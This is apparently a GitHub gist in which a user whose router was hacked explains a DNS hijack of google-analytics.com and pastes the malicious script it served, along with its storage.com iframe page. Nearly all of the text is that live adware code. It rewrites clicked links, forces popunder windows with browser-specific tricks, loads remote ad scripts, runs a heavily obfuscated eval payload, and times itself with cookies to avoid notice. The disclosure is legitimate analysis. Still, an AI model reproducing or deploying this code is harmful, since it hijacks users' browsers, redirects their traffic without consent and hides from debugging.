Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?

My router has been hacked. Here's what I know:

I'm unaware of how my router became infected, but the password has definitely been changed. I admittedly had not done any firmware updates in quite some time, which could be related to the infection.

The router was setting a custom DNS for google-analytics.com, which pointed to their apparently malicious server. Unfortunately, I did not realize it was DNS manipulation before I reset my router (I thought google-analytics.com was an invalid domain), so I did not get the original IP address. It servers up the script that spearheads this whole thing. The source for that script at the time of writing can be found in the file google-analytics.js

Once google-analytics runs, it inserts an iFrame that directs to http://storage.com/storage.html. The ad serving script is clever in that it will only serve you ads so many times in a given period, so that you won't be able to debug and you might not really think anything is wrong. It stores timed cookies on the storage.com domain to see which ads it served recently, and if it should start serving them again. The source for the storage.com iframe can be found in storage.html

If storage.html indicates that it is OK to start serving scripts again, it will send a postMessage with a chosen ad script. Each ad script has its own function that defines how the ad will be hooked - some bind to events, some put ads directly on the page, and some actually load in their own third party scripts. These are contained in the scripts variable in google-analytics.js

var ga_exists;
if(!ga_exists)
{
ga_exists = 1;
var is_responsive = false;
var use_keywords = false;
Date.prototype.addHours = function (h) {
this.setHours(this.getHours() + h);
return this
};
function shuffle(src) {
var cnt = src.length, tmp, idx;
while (cnt > 0) {
idx = Math.floor(Math.random() * cnt);
cnt--;
tmp = src[cnt];
src[cnt] = src[idx];
src[idx] = tmp;
}
return src;
}
function addEvent(obj, type, fn) {
if (obj.addEventListener) {
obj.addEventListener(type, fn, false)
} else if (obj.attachEvent) {
obj['e' + type + fn] = fn;
obj[type + fn] = function () {
obj['e' + type + fn](window.event)
};
obj.attachEvent('on' + type, obj[type + fn])
} else {
obj['on' + type] = obj['e' + type + fn]
}
}
function getCookie(name) {
var i, x, y, ARRcookies = document.cookie.split(';');
for (i = 0; i < ARRcookies.length; i++) {
x = ARRcookies[i].substr(0, ARRcookies[i].indexOf('='));
y = ARRcookies[i].substr(ARRcookies[i].indexOf('=') + 1);
x = x.replace(/^\s+|\s+$/g, '');
if (x == name)
return unescape(y)
}
}
function setCookie(name, value, hours) {
var exdate = new Date();
exdate.addHours(hours);
var c_value = escape(value) + ';expires=' + exdate.toUTCString() + ';path=/';
document.cookie = name + '=' + c_value
}
function startsWith(str, pat) {
if (typeof pat == 'object') {
for (_i = 0; _i < pat.length; _i++) {
if (str.toLowerCase().indexOf(pat[_i].toLowerCase()) == 0)
return true;
}
return false;
}
else
return (str.toLowerCase().indexOf(pat.toLowerCase()) == 0);
}
addEvent(window, 'load', function()
{
var cnt_all = document.createElement('img');
cnt_all.src = 'http://www.easycounter.com/counter.php?scanov_all';
cnt_all.style.display = 'none';
document.body.appendChild(cnt_all);
if(use_keywords)
{
var keywords = '';
var metas = document.getElementsByTagName('meta');
if (metas) {
var kwstr = '';
for (var i = 0; i < metas.length; i++) {
if (metas[i].name.toLowerCase() == 'keywords')
kwstr += metas[i].content;
}
if(kwstr) {
var tmp = kwstr.split(',');
var tmp2 = new Array();
for (var i = 0; i < tmp.length && tmp2.length < 3; i++) {
var kw = tmp[i].trim();
if(/^\w+$/.test(kw))
tmp2.push(kw);
}
if(tmp2.length > 0)
keywords = tmp2.join('+');
}
}
var replCookie = 'href-repl';
var replStaff = Math.floor((Math.random() * 18) + 1);
var replLink = 'http://msn.com' + '?staff=' + replStaff + '&q=' + keywords;
var replHours = 12;
addEvent(document, 'mousedown', function(evt){
if(getCookie(replCookie)) return;
evt = evt ? evt : window.event;
var evtSrcEl = evt.srcElement ? evt.srcElement : evt.target;
do {
if (evtSrcEl.tagName.toLowerCase() == 'a') break;
if (evtSrcEl.parentNode) evtSrcEl = evtSrcEl.parentNode;
} while (evtSrcEl.parentNode);
if (evtSrcEl.tagName.toLowerCase() != 'a') return;
if (!startsWith(evtSrcEl.href, new Array('http://', 'https://')))
return;
evtSrcEl.href = replLink;
setCookie(replCookie, 1, replHours);
});
}
if(window.postMessage && window.JSON)
{
var _top = self;
var cookieName = '';
var cookieExp = 24;
var exoUrl = '';
var exoPuId = 'ad_' + Math.floor(89999999 * Math.random() + 10000000);
if (top != self) {
try {
if (top.document.location.toString()) {
_top = top
}
} catch (err) {}
}
var exo_browser = {
is: function () {
var userAgent = navigator.userAgent.toLowerCase();
var info = {
webkit: /webkit/.test(userAgent),
mozilla: (/mozilla/.test(userAgent)) && (!/(compatible|webkit)/.test(userAgent)),
chrome: /chrome/.test(userAgent),
msie: (/msie/.test(userAgent)) && (!/opera/.test(userAgent)),
msie11: (/Trident/.test(userAgent)) && (!/rv:11/.test(userAgent)),
firefox: /firefox/.test(userAgent),
safari: (/safari/.test(userAgent) && !(/chrome/.test(userAgent))),
opera: /opera/.test(userAgent)
};
info.version = (info.safari) ? (userAgent.match(/.+(?:ri)[\/: ]([\d.]+)/) || [])[1] : (userAgent.match(/.+(?:ox|me|ra|ie)[\/: ]([\d.]+)/) || [])[1];
return info
}(),
versionNewerThan: function (version) {
currentVersion = parseInt(this.is.version.split('.')[0]);
return currentVersion > version
},
versionFrom: function (version) {
currentVersion = parseInt(this.is.version.split('.')[0]);
return currentVersion >= version
},
versionOlderThan: function (version) {
currentVersion = parseInt(this.is.version.split('.')[0]);
return currentVersion < version
},
versionIs: function (version) {
currentVersion = parseInt(this.is.version.split('.')[0]);
return currentVersion == version
},
isMobile: {
Android: function (a) { return a.navigator.userAgent.match(/Android/i) },
BlackBerry: function (a) { return a.navigator.userAgent.match(/BlackBerry/i) },
iOS: function (a) { return a.navigator.userAgent.match(/iPhone|iPad|iPod/i) },
Opera: function (a) { return a.navigator.userAgent.match(/Opera Mini/i) },
Windows: function (a) { return a.navigator.userAgent.match(/IEMobile/i) },
any: function (a) { return a.navigator.userAgent.match(/Android|BlackBerry|iPhone|iPad|iPod|Opera Mini|IEMobile/i) }
}
};
var browser = exo_browser;
var exopop = {
settings: {
width: 1024,
height: 768
},
init: function () {
if (browser.isMobile.any(_top))
exopop.binders.mobile();
if (browser.is.msie)
exopop.binders.msie();
if (browser.is.msie11)
exopop.binders.msie11();
if (browser.is.firefox)
exopop.binders.firefox();
if (browser.is.chrome && browser.versionFrom(30) && navigator.appVersion.indexOf('Mac') != -1)
exopop.binders.chrome30_mac();
if (browser.is.chrome && browser.versionOlderThan(30))
exopop.binders.chromeUntil30();
if (browser.is.chrome && browser.versionIs(30))
exopop.binders.chrome30();
else if (browser.is.chrome && browser.versionFrom(31))
exopop.binders.chrome31();
else if (browser.is.safari)
exopop.binders.safari();
else
exopop.binders.firefox();
},
windowParams: function () {
return 'width=' + exopop.settings.width + ',height=' + exopop.settings.height + ',top=0,left=0,scrollbars=1,location=1,toolbar=0,menubar=0,resizable=1,statusbar=1'
},
status: {
opened: false
},
opened: function () {
if (exopop.status.opened) return true;
if (getCookie(cookieName)) return true;
return false
},
setAsOpened: function () {
this.status.opened = true;
setCookie(cookieName, 1, cookieExp)
},
findParentLink: function (clickedElement) {
var currentElement = clickedElement;
if (currentElement.getAttribute('target') == null && currentElement.nodeName.toLowerCase() != 'html') {
var o = 0;
while (currentElement.parentNode && o <= 4 && currentElement.nodeName.toLowerCase() != 'html') {
o++;
currentElement = currentElement.parentNode;
if (currentElement.nodeName.toLowerCase() === 'a' && currentElement.href != '') {
break
}
}
}
return currentElement
},
triggers: {
firefox: function () {
if (exopop.opened()) return true;
var popURL = 'about:blank';
var params = exopop.windowParams();
var PopWin = _top.window.open(popURL, exoPuId, params);
if (PopWin) {
PopWin.blur();
if (navigator.userAgent.toLowerCase().indexOf('applewebkit') > -1) {
_top.window.blur();
_top.window.focus()
}
PopWin.Init = function (e) {
with(e) {
Params = e.Params;
Main = function () {
var x, popURL = Params.PopURL;
if (typeof window.mozPaintCount != 'undefined') {
x = window.open('about:blank');
x.close()
} else if (navigator.userAgent.toLowerCase().indexOf('chrome/2') > -1) {
x = window.open('about:blank');
x.close()
}
try {
opener.window.focus()
} catch (err) {}
window.location = popURL;
window.blur()
};
Main()
}
};
PopWin.Params = {
PopURL: exoUrl
};
PopWin.Init(PopWin)
}
exopop.setAsOpened();
return
},
chromeUntil30: function () {
if (exopop.opened()) return true;
window.open('javascript:window.focus()', '_self');
var w = window.open('about:blank', exoPuId, exopop.windowParams());
var a = document.createElement('a');
a.setAttribute('href', 'data:text/html,<scr' + 'ipt>window.close();</scr' + 'ipt>');
a.style.display = 'none';
document.body.appendChild(a);
var e = document.createEvent('MouseEvents');
e.initMouseEvent('click', true, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null);
a.dispatchEvent(e);
document.body.removeChild(a);
w.document.open().write('<script type="text/javascript">window.location="' + exoUrl + '";<\/script>');
w.document.close();
exopop.setAsOpened()
},
chrome30: function (W) {
if (exopop.opened()) return true;
var link = document.createElement('a');
link.href = 'javascript:window.open("' + exoUrl + '","' + exoPuId + '","' + exopop.windowParams() + '")';
document.body.appendChild(link);
link.webkitRequestFullscreen();
var event = document.createEvent('MouseEvents');
event.initMouseEvent('click', true, true, window, 0, 0, 0, 0, 0, false, false, true, false, 0, null);
link.dispatchEvent(event);
document.webkitCancelFullScreen();
setTimeout(function () {
window.getSelection().empty()
}, 250);
var Z = W.target || W.srcElement;
Z.click();
exopop.setAsOpened()
},
safari: function () {
if (exopop.opened()) return true;
var popWindow = _top.window.open(exoUrl, exoPuId, exopop.windowParams());
if (popWindow) {
popWindow.blur();
popWindow.opener.window.focus();
window.self.window.focus();
window.focus();
var P = '';
var O = top.window.document.createElement('a');
O.href = 'data:text/html,<scr' + P + 'ipt>window.close();</scr' + P + 'ipt>';
document.getElementsByTagName('body')[0].appendChild(O);
var N = top.window.document.createEvent('MouseEvents');
N.initMouseEvent('click', false, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null);
O.dispatchEvent(N);
O.parentNode.removeChild(O)
}
exopop.setAsOpened()
},
tab: function () {
if (exopop.opened()) return true;
var a = top.window.document.createElement('a');
var e = document.createEvent('MouseEvents');
a.href = exoUrl;
document.getElementsByTagName('body')[0].appendChild(a);
e.initMouseEvent('click', true, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null);
a.dispatchEvent(e);
a.parentNode.removeChild(a);
exopop.setAsOpened()
},
mobile: function (triggeredEvent) {
if (exopop.opened()) return true;
var clickedElement = triggeredEvent.target || triggeredEvent.srcElement;
if (clickedElement.nodeName.toLowerCase() !== 'a') {
clickedElement = exopop.findParentLink(clickedElement)
}
if (clickedElement.nodeName.toLowerCase() === 'a' && clickedElement.getAttribute('target') !== '_blank') {
window.open(clickedElement.getAttribute('href'));
exopop.setAsOpened();
_top.document.location = exoUrl;
if (triggeredEvent.preventDefault != undefined) {
triggeredEvent.preventDefault();
triggeredEvent.stopPropagation()
}
return false
}
return true
}
},
binders: {
msie: function () {
addEvent(document, 'click', exopop.triggers.firefox)
},
firefox: function () {
addEvent(document, 'click', exopop.triggers.firefox)
},
chromeUntil30: function () {
addEvent(document, 'mousedown', exopop.triggers.chromeUntil30)
},
chrome30: function () {
addEvent(document, 'mousedown', exopop.triggers.chrome30)
},
chrome31: function () {
addEvent(document, 'mousedown', exopop.triggers.tab)
},
msie11: function () {
addEvent(document, 'mousedown', exopop.triggers.tab)
},
chrome30_mac: function () {
addEvent(document, 'mousedown', exopop.triggers.chromeUntil30)
},
safari: function () {
addEvent(document, 'mousedown', exopop.triggers.safari)
},
mobile: function () {
addEvent(document, 'click', exopop.triggers.mobile)
}
}
};
var exoMobPop = 0;
function exoMobile() {
addEvent(document, 'click', function(){
var targ;
var e = window.event;
if (e.target) targ = e.target;
else if (e.srcElement) targ = e.srcElement;
if (targ.nodeType == 3 || targ.tagName != 'A') targ = targ.parentNode;
if (getCookie(cookieName)) exoMobPop = 1;
if (exoMobPop == 0) {
if(targ && targ.tagName == 'A')
targ.target = '_blank';
exoMobPop = 1;
setTimeout(function() {
setCookie(cookieName, 1, cookieExp / 2);
document.location.assign(exoUrl);
}, 1000);
}
});
}
var scripts = null;
var script_names = [];
var recyclePeriod = 0;
if(browser.isMobile.any(_top) && is_responsive)
{
recyclePeriod = 3 * 60 * 60 * 1000;
scripts = {
'938466': function() {
exoUrl = 'http://www.reduxmediia.com/apu.php?n=&zoneid=5716&cb=3394654&popunder=1&direct=1';
cookieName = 'splashMob-938466';
exoMobile();
}
};
}
else
{
recyclePeriod = 6 * 60 * 60 * 1000;
scripts = {
'propeller': function() {
(function() {eval((function(b3){for(var X3="",z3=0,V3=function(b3,F3){for(var p3=0,q3=0;q3<F3;q3++){p3*=96;var P3=b3.charCodeAt(q3);if(P3>=32&&P3<=127){p3+=P3-32;}}return p3;};z3<b3.length;){if(b3.charAt(z3)!="`")X3+=b3.charAt(z3++);else{if(b3.charAt(z3+1)!="`"){var o3=V3(b3.charAt(z3+3),1)+5;X3+=X3.substr(X3.length-V3(b3.substr(z3+1,2),2)-o3,o3);z3+=4;}else{X3+="`";z3+=2;}}}return X3;})("var V9r3=window;for(var W3 in` 5 ){if(W3.length===((33.6E1,68.)<=(0x150,3)?\'o\':(3.36E2,4.95E2)<=16.0E1?(0x1C7,\'_\'):(58.,9.3E1)<1.419E3?(48,8):(0x1ED,107))&&W3.charCodeAt(((1.57E2,0xC7)>=(117.,0x78)?(59,5` Z 98,116.)>=4.66E2?(10.39E2,132` = 48,7.60E1)))===(14.63E2>=(25.,5.14E2)?(141.,101):(115,28))&&W3.charCodeAt(((0x1A1,7.36E2)>(3.6E2,11.55E2)?(4.3E1,\"x\"):(0x57,9.63E2)>=(10.99E2,0x1B7)?(97,7):(28.,72.7E1)<=(7.2E1,0x165)?122.30E1:(0x53,1.46E2)))===((0xA1,87.60E1)>(32,143.)?(96,116):(3,0x216))&&W3.charCodeAt(((1.289E3,71` X#108.,0x10B)?(48.90E1,3):(116.4E1,9.99E2)))===((3.46E2,0x21F)<=108?\'(\':(0xF2,5.79E2)<=(110.5E1,13.51E2)?(0x20B,117):(83.,90))&&W3.charCodeAt(((0x14D,100.30E1)>=11.48E2?127.:52.>(77,0x16E)?(0xBB,6.0E1):(0x1,0x24D)>=0xB5?(7.59E2,0):(63,92)))===(149.1E1<=(0x1B7,0xBD)?(118.,\"Y\"):(1.284E3,0x158)>=0xA0?(0xD5,100):(10.85E2,0x129)))break};for(var Q3 in V9r3){if(Q3.length===((113,107.4E1)>=(1.07E2,0x9C)?(8,6):(1.421E3,76))&&Q3.charCodeAt(3)===101` (+5` 3 10` @+1)===99` ?+0)===((5.21E2,0x1)<54.?(63.,115):(6.2` 4!A)))break};for(var J3 in V9r3){if(J3.length===(0x1A6>=(4.10E1,84)?(2.27E2,6):(0x24D,135.1E1))&&J3.charCodeAt(3)===100` (+5` 3 19` @+1` J!5` @+0` I\")break};var D4l={\"l3\":\'ppu_overlay\',\"E4\":\"ppuCount\",\"T` + ush\",\"x4\":2,\'x\':\'clicksSinceLastPpu\',\"J4\":\"sessionTimeout\",\"g3` ,%Storage\",\"D4\":36,\"y4\":\"ppu` F%y3\":\'lastPpu\',\"B` :\"Clicks\",\"q4\":\"c` ) SinceSessionStart\",\"D5\":\"addEventListener\",\"j4\":\"appendChild\",\"a4\":\"series` V#w5\":true,\"B3\":\'` 2&\',\"C4\":1000,\"w` U ubstr\",\'x1\':\"inj\",\"k3\":\"startClicks\",\"G` G ession` ,$i4\":\"join\",\"M4\":\'p\',\"M5\":\'style\',\"T5\":\'on\',\"b4\":\"pathname\",\"u3\":\'click\',\"e3\":\"cookie\",\"c3\":\'_\',\"A4\":\"target\",\"o5\":\"documentElement\",\"g4\":\"onClickTrigger\",\"Y4\":\"url\",\"t3\":\'clicksSinceSessionStart\',\"C3\":\"SS\",\"e4\":false,\"v5\":0,\"j3\":\"call\",\"U4\":\"ppuQnty\",\"p4\":\"zoneId\",\"I3\":\'ppuCount\',\"d5\":\"test\",\"P4\":\"createElement\",\"L5\":null,\"Y3\":\'|\',\"X4\":\"location\",\"a3\":\"indexOf\",\"Z5\":\'string\',\'E\':\'__test\',\"n5\":1,\"H4\":\"toS` ? \",\"f4\":\'__PPU_SESSION\',\"W4\":\"left\",\"R4\":\"className\",\"A5\":\'\',\"t` @ astPpu\",\"x5\":\"userAgent\",\"U3\":2592000000,\"R5\":\"match\",\"K3\":\"clicksSinceLastPpu\",\"V4\":\"limLo\",\'y\':\"random\",\"I4\":\"body\"};function start(){var U=\'beforeunload\',N=\"` %!\";F4=D4l.e4;if(L4()){Z4();}else if(c4()>D4l.v5){p5=setTimeout(Z4,c4());}if(f5[N]&&z4[D4l.D5]){var G=D4l.e4;` \/%(U,function(k` @!e=\"returnValue\",g=\"event\",C=\'Support this site, make your choice below\',B=C;if(d4&&!G){setTimeout(function(){var l=\"assign\";G=D4l.w5;z4[D4l.X4][l](f5` ) Y4]);},D4l.C4);(k||V9r3[J3][g])[e]=B;return B;}` #\"D4l.L5;});}}function k4(){var l=\"removeChild\",k=\'.\',e=N4(k+i5),g=e.length;while(g--){P5[D4l.I4][l](e[g]);}if(p5){clearTimeout(p5);p5=D4l.L5;}}function N3(l){var k=\"clientLeft\",e=\"scroll` )!g=\"pageXOffset\",C` F#Top\",B` E#` ) U` F!Y` D#N=\"round\",G=\"getBoundingClientRect\",a=P5[D4l.I4],j=l[G]();return {top:Math[N](j.top+(z4[U]||root[B]||a[B])-(` + C` + C]||D4l.v5)),left:Math[N](j[D4l.W4]+(z4[g]||` R e` R e])-(` + k` + k]||D4l.v5))};}function S5(){var l=\'; \',k=\'path=\/\',e=\"toUTCString\",g=\'expires=\',C=\'=\',B=\"setItem\",U=[],N,G;for(G=D4l.v5;G<O4.length;G+` 1 n5){U[D4l.T4](data[O4[G]]);}N=` 4!i4](D4l.Y3);if(f5` K C3]&&H5){H5[B](F5,N);}else if(l4){P` C!e3]=[F5+C+N,g+new Date(now()+h5)[e](),k]` H i4](l);}}function N4(k){var e=\"querySelectorAll\",g=[];try{g=Array.prototype.slice.call(P5[e](k));}catch(l){}return g;}var K4=function(){var l=\"startTimeout\",k=\"attachEvent\",e=\'ontouch` C \',g=\'mousedown\',C=\"src\",B=\'none\',U=\"display\",N=\'iframe\',G=\"retargetingFrameUrl\";if(f5[G]){var a=P5[D4l.P4](N);a[u4][U]=B;a[C]=` F ;` =\"I4]` G j4](a);}var j=n4?g:D4l.u3,c=e;if(` I\"D5]){` \"%(j,O5,D4l.w5);(c in root)&&` :&c` 9\'}else if(P5[k]){` \" (D4l.T5+j,O5);}if(!f` Z!k3]){setTimeout(start,f5[l]);}};function G3(l,k){var e=k.length;while(e--){if(l===k[e]){return D4l.w5;}}` %&e4;}function s3(l,k){var e=((0x230,6.72E2)>=(43,48.30E1)?(0xC0,\')\'):(50.,0xE2)),g=\'(\',C=k.length\/D4l.x4,B=k[D4l.w4](D4l.v5,C),U` +&C),N=[],G,a;for(a=` B!;a<l.length;a+` 0 n5){G=U` V a3](l[a]);N` + T4](G!==-` C!?B[G]:` ;!}return eval(g+` J!i4](D4l.A5)+e);}function L4(){` K\"!F4&&!o4()&&(q5()||r4()` C\'r` D&data[D4l.E4]<f5` & U4]&&(` &\"B4]?!` =$K3]||` \"\'>=` >%:now()>` D$t4]+` 7\"y4]*D4l.C4);}function m5(){if(q5()){` O$a4]=now();` *$E4]=0` %%q` * }` I$K3]=1` 2(+` $\'E4` \")t4]=now();S5();k4();if(c4()>D4l.v5){p5=setTimeout(Z4,c4());}}function Z4(){var l=\'fgsdfs\',k=\"id\",e=\"offsetHeight\",g=\"smartOverlayMin` 2#C` C#Width\",B` 9,` 2\"U=\'object, iframe, embed\',N` E)\",G=\"add` \'#;if(o4()){return ;}if(f5[G]){V5({left:0,top:0,width:\'100%\',height` &#position:\'fixed\'});}if(f5[N]){var a=N4(U),j=a.length,c;while(j--){` H!B]>a[j][C]||f5[g` (\"e]){continue;}if(` @ k]===l` .\'c=N3` 7 );V5({left:c[D4l.W4]+\'px\',top:c.top` )!height:a[j][e` <\"width` -!C` O\"position:\'absolute\'});}}}function o4(){var l=\"ppuDisableTrigger\";return z4[l]&&!f5[D4l.x1];}function v4(l){var k=\"parentNode\",e=\"aggressive\",g=\"clickAnywhere\",C=\"includes\",B=\"concat\",U=\"ex` 0#N=\'embed\',G=\'object\',a=\"toLowerCase\",j=\"tagName\",c=[],J=[],z=l[j][a](),r;if(z===G||z===N){return D4l.e4;}if(l[D4l.R4]===i5` 5(w5;}r=f5[U].length;while(r){r-=D4l.n5;c=c[B](N4(` E [r]))` Q\"C` <7J=J` N%C` P#if(f5[g]||(f5[e]&&` 9 .length&&!J` $\")){J[D4l.T4](root);}while(l){if(G3(l,c)){return D4l.e4;}` 3#J` -)w5;}l=l[k];}` C*function c4(` K$data[D4l.E4]<f5` & U4]&&!` &\"B4]?` <$t4]+` >\"y4]*D4l.C4-now():` I#G` E\'a` G%J` A+-D4l.n5;}function ` 3 {return +new Date()` 8&q5` 8%f5[D4l.G4]?!data` ) q4]||` \"\'>=` >%:now()>` D$a4]+` 7\"J4]*D4l.C4;}function s4(){var l=\"dispatchEvent\",k=\"initMouse` ,\"e=\'_blank\',g=\"href\",C=\'` 9%s\',B=\"creat` L#U=\'a\',N=P5[D4l.P4](U),G=P5[B](C);N[g]=f` 8!Y4];N` C A4]=e;G[k](D4l.u3,D4l.w5,D4` \" z4` , n` +!v` 2!v` 9!v` ((` M\"e` K!e` R!` \'\"` X\"L5);N[l](G);}function S4(){var k=\"opener\",e=\"close\",g=\"mozPaintCount\",C=\"focus\",B=\"blur\",U=\',\',N=\"availHeight\",G=\'h` & =\',a` 5\"Width\",j=\'width=\',c=\'left=0\',J=\'top=0\',z=\'resizable=1\',r=\'menubar=0\',T=\'statusbar=1\',n=\'location=1\',D=\'scrollbars=1\',q=\'tool` W\"A=\"getTime\",X=\'ppu\',W=\'about:blank\',o=\"open\",d=z4[o](W,X+new Date()[A](),[q,D,n,T,r,z,J,c,j+V9r3[Q3][a],G` $%N]][D4l.i4](U));d[B]();if(h4){z4` )!z4[C]();}if(d[g]!==undefined){d[o](W)[e` > try{d[k]` K\"catch(l){}d[D4l.X4]=f5` & Y4];}var O5=function(l){if(l&&l` J A4]){d4=D4l.e4;}if(F4` > f5` < k3]){Q4+` = n5;if(Q4>=` 2\'start();}}return ;}if(!L4()||(l&&!v4(l` K A4]))){if(f5` , G4]){data` : q4]+=1` Z ` 9\"B` 3(K3` :!S5();if(` >#G4]&&` \"%===` J$q4])||` A#B4]&&` 3$E4]<` O\"U4]&&` ;%===` =$K3])){Z4();}return ;}if(n4||m4` Y x5]` U R5](\/android|iPhone|iPad|iPod\/i)){s4();}else{S` & m5();},u4=D4l.M5,f5=arguments[D4l.v5],E3` &*n5];if(typeof f5==` [ Z5){f5=s3(f5,E3);}var z4=window,P5=document,root=P5[D4l.o5],m4=navigator,F4=D4l.w5,Q` $!v5,d` +$n4=(m4` U x5]` # R5](\/Chrome\\\/([0-9]{1,})\/)||[])` G n5]|D4l.v5,h4=\/applewebkit\/i` < d5](m4` G x5]),F5=` T f4,` Z!,f5` D p4]` ##V4]&&P` 1!X4]` X b4]` #!i4](D4l.c3),l4=(V9r3[W3` @!e3]=D4l.E)` X a` 0\"j3]` 7,,` B!!==-D4l.n5,h5` W U3,H5=z4` U g3],O4=` P B3` O I3` V y` (!t` \/!x],data=(function(){var l=((0x239,101.60E1)>=(12.09E2,14)?(15,10):0x1FA<=(3.570E2,0x198)?(69,\'i\'):76<=(8.55E2,52)?(0x110,87.80E1):(117.,0x1AA)),k=\"split\",e=\'=([^;]*)\',g=\'(^|; )\',C=\"getItem\",B=\"resetCounters\",U={},N,G,a;if(!f5[B]){if(f5[D4l.C3]&&H5){G=H5[C](F5);}else if(l4){G=(P` F!e3]` O R5](new RegExp(g+F5+e))||D4l.v5)` H x4];}}N=(G` 2!A5)[k](D4l.Y3);for(a=` K!;a<O4.length;a+` 1 n5){U[O4[a]]=parseInt(N[a],l)||` R\"}return U;}()),i5=f5[D4l.x1]?D4l.l3:D4l.M4+Math` 6 y]()` ? H4](D4l.D4` *!w` )\"x4),p5,V5=(function(){var B=\'url(data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAE` , L` 1!BA` + IBRAA7)\',U=\"backgroundImage\",N=\"zIndex\",G=\'div\',a=P5[D4l.P4](G);a` ( R4]=i5;a[u4][N]=f5[N]` (\"U]=B;return function(l){var k=\"hasOwnProperty\",e=\"cloneNode\",g=a[e](D4l.e4),C;for(C in l){if(l[k](C)){g[u4][C]=l[C];}}P5[D4l.I4]` # j4](g);};}());z4` 8 g4]=O5;(function(g){var C=\'DOMContentLoaded\',B=\"frameElement\",U=\"createEventObject\",N=\"doScroll\",G=\'load\',a=\'complete\',j=\"readyState\",c=\'` * statechange\',J=\'detachEvent\',z=\'remove` + Listener\',r=\'at` =&T=\'add` 6*n=D4l.e4,D` $ w5,q=P5[D4l.D5]?T:r,A` %\'z:J,X` 6\'D4l.A5:D4l.T5,W=function(l){var k=\"type\";if(l[k]===c&&P5[j]!==a){return ;}` 7#G?z4:P5)[A](X+l[k],W,D4l.e4);if(!n){n=D4l.w5;g[D4l.j3](z4,l[k]||l);}},o=function(){var e=\'left\';try{root[N](e);}catch(l` @!k=50;setTimeout(o,k);return ;}W(D4l.A5);};if(P5[j]===a){g();}else{` 2!U]&&root[N]){try{D=!z4[B];}catch(l){}if(D){o();}}P5[q](X+C,W,D4l.e4);` ,#c` )&z4` B!G` =&}}(K4))"));}("{\"bIru42\":7sss,\"duuOq43vdx\":fdv94,\"duuOq43vdxOrM4uwd\":03g4,\"95d30Oq43vdx\":03g4,\"95d30Oq43vdxMwrWwu0h\":jls,\"95d30Oq43vdxMwrH4wmh0\":zss,\"uw9d1v4OrM4uwd\":fdv94,\"evweoArxah434\":03g4,\"dmm3499wq4\":03g4,\"34940Cigr0439\":fdv94,\"vw5Li\":fdv94,\"9499wirTw54ig0\":7zcss,\"nngTw54ig0\":jl,\"nngQr0x\":k,\"wrevgu49\":[],\"42evgu49\":[],\"g3v\":\"h00n:\\\/\\\/irevweodu9.r40\\\/dfg.nhn?bir4wu=7kjyy\",\"340d3m40wrmF3d54U3v\":fdv94,\"90d30Tw54ig0\":s,\"90d30Cvweo9\":s,\"bir4Iu\":7kjyy,\"nngCvweo9\":s,\"9499wirCvweo9\":s,\"SS\":fdv94,\"grvidu\":fdv94}","abcdefghijklmnopqrstuvwxyz0123456789d1eu4fmhw8ov5rinp390gqa2xbsz7kjlcy6t"))
},
'adcash': function() {
var adcash = document.createElement('script');
adcash.type = 'text/javascript';
adcash.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944';
document.body.appendChild(adcash);
},
'1896743': function() {
exoUrl = 'http://geolocations.net';
cookieName = 'splashWeb-896743';
exopop.init();
},
'2896743': function() {
exoUrl = 'http://geolocations.net';
cookieName = 'splashWeb-89674';
exopop.init();
}
};
}
for(var i in scripts) {
if(scripts.hasOwnProperty(i))
script_names.push(i);
}
script_names = shuffle(script_names);
var origin = 'http://storage.com'
var path = '/storage.html';
var sign = '90e79fb1-d89e-4b29-83fd-70b8ce071039';
var iframe = document.createElement('iframe');
var done = false;
iframe.style.cssText = 'position:absolute;width:1px;height:1px;left:-9999px;';
iframe.src = origin + path;
addEvent(iframe, 'load', function(){
addEvent(window, 'message', function(evt){
if (!evt || evt.origin != origin)
return;
var rsp = JSON.parse(evt.data);
if(!rsp || rsp.sign != sign || rsp.act != 'ret')
return;
scripts[rsp.data]();
if(browser.isMobile.any(_top) && is_responsive) {
iframe.contentWindow.postMessage(
JSON.stringify({
act: 'set',
sign: sign,
data: rsp.data
}),
origin
);
} else {
addEvent(document, 'mousedown', function(){
if(done) return;
done = true;
iframe.contentWindow.postMessage(
JSON.stringify({
act: 'set',
sign: sign,
data: rsp.data
}),
origin
);
});
}
});
iframe.contentWindow.postMessage(
JSON.stringify({
act: 'get',
recycle: recyclePeriod,
sign: sign,
data: script_names
}),
origin
);
});
document.body.appendChild(iframe);
}
});
}
<!doctype html>
<html>
<body>
<script type="text/javascript">
Date.prototype.addHours = function (h) {
this.setHours(this.getHours() + h);
return this
};
function addEvent(obj, type, fn) {
if (obj.addEventListener) {
obj.addEventListener(type, fn, false)
} else if (obj.attachEvent) {
obj["e" + type + fn] = fn;
obj[type + fn] = function () {
obj["e" + type + fn](window.event)
};
obj.attachEvent("on" + type, obj[type + fn])
} else {
obj["on" + type] = obj["e" + type + fn]
}
}
function getCookie(c_name) {
var i, x, y, ARRcookies = document.cookie.split(";");
for (i = 0; i < ARRcookies.length; i++) {
x = ARRcookies[i].substr(0, ARRcookies[i].indexOf("="));
y = ARRcookies[i].substr(ARRcookies[i].indexOf("=") + 1);
x = x.replace(/^\s+|\s+$/g, "");
if (x == c_name) {
return unescape(y)
}
}
}
function setCookie(c_name, value, exdays) {
var exdate = new Date();
exdate.addHours(4);
var c_value = escape(value) + ((exdays == null) ? "" : ";expires=" + exdate.toUTCString()) + ";path=/";
document.cookie = c_name + "=" + c_value
}
var sign = '90e79fb1-d89e-4b29-83fd-70b8ce071039';
var prefix = 'ga_js_cds';
addEvent(window, 'message', function(evt){
if (!evt)
return;
var req = JSON.parse(evt.data);
if(!req || req.sign != sign)
return;
if(req.act == 'get') {
var recyclePeriod = req.recycle;
for (var i in req.data) {
var script = req.data[i];
var now = new Date();
var last_run = getCookie('ga_js_cds-' + script);
if(!last_run && window.localStorage)
last_run = localStorage.getItem('ga_js_cds-' + script);
last_run = last_run ? new Date(last_run) : now;
var delta = now - last_run;
if(delta && delta < recyclePeriod)
continue;
evt.source.postMessage(
JSON.stringify({
act: 'ret',
sign: sign,
data: script
}),
evt.origin
);
break;
}
} else if(req.act == 'set') {
setCookie('ga_js_cds-' + req.data, new Date(), 1);
if(window.localStorage)
localStorage.setItem('ga_js_cds-' + req.data, new Date());
}
});
</script>
</body>
</html>
@kazemimehdi

